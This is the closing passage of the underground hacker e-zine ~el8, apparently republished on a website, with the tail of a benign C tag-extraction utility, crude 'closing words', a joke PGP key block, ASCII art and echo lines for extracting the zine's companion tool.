if (sscanf(buf,tag,&articleno,articlename) == 2)
{
if (buf[strlen(buf)-1] == '\n') buf[strlen(buf)-1] = '\0';
switch (io) {
case 'i':
fprintf(stderr,"[(%04i) %20s]\t @ \033[1mLine %i\033[m\n",articleno
,articlename,lineno);
break;
case 'X':
fprintf(stderr,"[(%4X) %20s]\t @ \033[1mLine %i\033[m\n",articleno,
articlename,lineno);
break;
case 'O':
fprintf(stderr,"[(%4o) %20s]\t @ \033[1mLine %i\033[m\n",articleno,
articlename,lineno);
break;
case 'x':
fprintf(stderr,"[(%4x) %20s]\t @ \033[1mLine %i\033[m\n",articleno,
articlename,lineno);
break;
default:
fprintf(stderr,"[(%04i) %20s]\t @ \033[1mLine #%i\033[m\n",articlen
o,articlename,lineno);
break;
}
}
bzero((char*)&buf,sizeof(buf));
}
fclose (out);
fclose (TFD);
exit (0);
}
[END_CUT] eltag.c




.~v~----------------------------------------------------------~v~.
; *23* ~v~ clos1ngz werdz -- ~el8 TEaM ;
`----------------------------------------------------------------'

GET the WORD out. GET the WORD out. GET the WORD out. GET the WORD out.

th1s issue r0kz. y0u may help ~el8 by spre4d1ng the w0rd. unfortunatly
n01 w4ntz t0 h0zt this ezine, bekoz they r 2 fukn sk4r3d. tell every1
u kn0w ab0ut ~el8, pass it 0n via dcc, email it t0 y0ur grandparentz
on a0l.com, print it 0ut, put s0me we4d on it, roll it up, and sm0ke it.

~el8 is dope. kool-rad k-fat badassezinenodoubt
~el8 is dope. kool-fresh k-hip shit shit
~el8 is dope. k-hip k-kul elite elite
~el8 is dope. bad ass badaz eliteasshitaselite
~el8 is dope. k-hip fuck!. elite elite
~el8 is dope. kool-fresh ~el8!roxroxrox shit shit
~el8 is dope. kool-rad koolhipawesome badassezinenodoubt

GET the WORD out. GET the WORD out. GET the WORD out. GET the WORD out.

to verify ~el8 y0u m4y uze thiz public key:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 31.8-720i

~el80d4yw4r3zhackpussybitchcodefuckcuntsuckHACKlamerlameexploitk
routephrackcotnophreakPLAtheinfancyconceptr00tshipleylkmplaguez!
antiloveADMTESOrootnobodyhackinghackershackerzhackalotF.U.C.K.AA
FEHstrHERTgaiusACZawrJOBEcrackcocainheroinsmokedopeUNIXVMSLINUX!
fluffibunnidatacouriersb4b09xx25x.25ROLMSDMShdlcLAPBPPPPSNSPRINT
internetWAREZLoD/MoDlegionofdoomMastersofdumpstersphonetelcoseno
jduckw00w00cDccultdeadcowcultdeadcatcultdeadjimmorrison2pacrapFi
defacementsrockwwwdefacersdefacethischriscrossthehackerschoice!l
bbsCCC2600BoWSoWWoWCoWPoWprisonersofWarEzDCCfileuploadmp3SEXpusy
violencedeathmurderkillSPAMilovespamSPAFpurduechickenshitpoopLoL
roflmao:D:PchatroomIRCinternetretardchatATTat&tbellmahballz~el8o
roxsuxhackzfuxzerodayz0dayzodayzjudgejudyisourgod~el80dayw4r3z4u

-----END PGP PUBLIC KEY BLOCK-----

[EOW]
[EOI]
echo '
lllllll 888888888
l:::::l 88:::::::::88
l:::::l 88:::::::::::::88
l:::::l 8::::::88888::::::8
eeeeeeeeeeee l::::l 8:::::8 8:::::8
ee::::::::::::ee l::::l 8:::::8 8:::::8
_________ _____ e::::::eeeee:::::ee l::::l 8:::::88888:::::8
/ \ / |e::::::e e:::::el::::l 8:::::::::::::8
/ ~el8 \/ /e:::::::eeeee::::::el::::l 8:::::88888:::::8
/ _ / e:::::::::::::::::e l::::l 8:::::8 8:::::8
/ / \ / e::::::eeeeeeeeeee l::::l 8:::::8 8:::::8
\_____/ \________/ e:::::::e l::::l 8:::::8 8:::::8
e::::::::e l::::::l8::::::88888::::::8
e::::::::eeeeeeee l::::::l 88:::::::::::::88
ee:::::::::::::e l::::::l 88:::::::::88
eeeeeeeeeeeeee llllllll 888888888
.g4yd4nb4n.

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 31.8-720i

~el80d4yw4r3zhackpussybitchcodefuckcuntsuckHACKlamerlameexploitk
routephrackcotnophreakPLAtheinfancyconceptr00tshipleylkmplaguez!
antiloveADMTESOrootnobodyhackinghackershackerzhackalotF.U.C.K.AA
FEHstrHERTgaiusACZawrJOBEcrackcocainheroinsmokedopeUNIXVMSLINUX!
fluffibunnidatacouriersb4b09xx25x.25ROLMSDMShdlcLAPBPPPPSNSPRINT
internetWAREZLoD/MoDlegionofdoomMastersofdumpstersphonetelcoseno
jduckw00w00cDccultdeadcowcultdeadcatcultdeadjimmorrison2pacrapFi
defacementsrockwwwdefacersdefacethischriscrossthehackerschoice!l
bbsCCC2600BoWSoWWoWCoWPoWprisonersofWarEzDCCfileuploadmp3SEXpusy
violencedeathmurderkillSPAMilovespamSPAFpurduechickenshitpoopLoL
roflmao:D:PchatroomIRCinternetretardchatATTat&tbellmahballz~el8o
roxsuxhackzfuxzerodayz0dayzodayzjudgejudyisourgod~el80dayw4r3z4u

-----END PGP PUBLIC KEY BLOCK-----
'
echo 'Extracted eldump.c'
echo 'use $CC eldump.c -o eldump'
echo './eldump ~el8[0] (-v | -vv | -vvv)'
echo
echo ' * ~el8 team 294 local 24 *'
echo ' * check local listings *'

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT